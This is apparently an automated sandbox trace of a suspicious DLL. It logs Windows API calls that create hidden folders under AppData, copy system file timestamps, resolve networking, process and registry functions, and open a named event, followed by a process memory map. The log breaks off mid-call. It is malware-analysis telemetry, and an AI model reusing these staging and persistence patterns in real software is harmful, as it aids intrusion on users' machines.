0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.962] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.962] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.962] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.963] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.963] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.963] GetLastError () returned 0xb7 [0031.963] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.963] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.963] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.963] wsprintfA (in: param_1=0x16f278, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.963] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.963] wsprintfA (in: param_1=0x16f174, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.963] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.963] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.963] CloseHandle (hObject=0x74) returned 1 [0031.963] GetLastError () returned 0x0 [0031.963] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.963] GetLastError () returned 0x0 [0031.963] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.964] GetSystemDirectoryA (in: lpBuffer=0x16f278, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.964] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.964] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.964] CloseHandle (hObject=0x74) returned 1 [0031.964] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.964] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.965] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.965] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.965] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.965] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.966] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.966] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.966] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.966] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.966] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.967] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.967] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.967] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.967] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.968] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.968] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.968] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.968] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.968] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.968] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.968] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.968] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.968] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.970] HeapDestroy (hHeap=0x13c0000) returned 1 Process: id = "16" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f860" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 816 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 817 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 818 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 819 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 820 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 821 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 822 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 823 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 824 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 825 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 827 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 828 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 829 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 830 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 831 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 832 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 833 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 834 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 835 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 836 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 837 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 838 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 839 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 840 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 841 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 842 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 843 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 844 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 845 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 846 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 847 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 848 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 849 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 850 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 851 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 852 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 853 start_va = 0x600000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 854 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 855 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 856 start_va = 0x760000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2975 start_va = 0x820000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 2976 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 2977 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 38 os_tid = 0xb14 [0032.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afabc | out: lpSystemTimeAsFileTime=0x2afabc*(dwLowDateTime=0xe0cc3210, dwHighDateTime=0x1d3dfba)) [0032.005] GetCurrentProcessId () returned 0xb10 [0032.005] GetCurrentThreadId () returned 0xb14 [0032.005] GetTickCount () returned 0x17290 [0032.005] QueryPerformanceCounter (in: lpPerformanceCount=0x2afab4 | out: lpPerformanceCount=0x2afab4*=362293408) returned 1 [0032.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.006] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.007] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.008] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.008] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.008] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.008] GetCurrentThreadId () returned 0xb14 [0032.008] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"0\"" [0032.008] GetEnvironmentStringsW () returned 0x3378a8* [0032.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7509f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.008] FreeEnvironmentStringsW (penv=0x3378a8) returned 1 [0032.008] GetStartupInfoA (in: lpStartupInfo=0x2afa0c | out: lpStartupInfo=0x2afa0c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.009] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.009] SetHandleCount (uNumber=0x20) returned 0x20 [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] GetACP () returned 0x4e4 [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af9ec | out: lpCPInfo=0x2af9ec) returned 1 [0032.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af4b8 | out: lpCPInfo=0x2af4b8) returned 1 [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2af448 | out: lpCharType=0x2af448) returned 1 [0032.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x2af238, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.009] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2af4cc | out: lpCharType=0x2af4cc) returned 1 [0032.009] GetLastError () returned 0x0 [0032.009] SetLastError (dwErrCode=0x0) [0032.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, 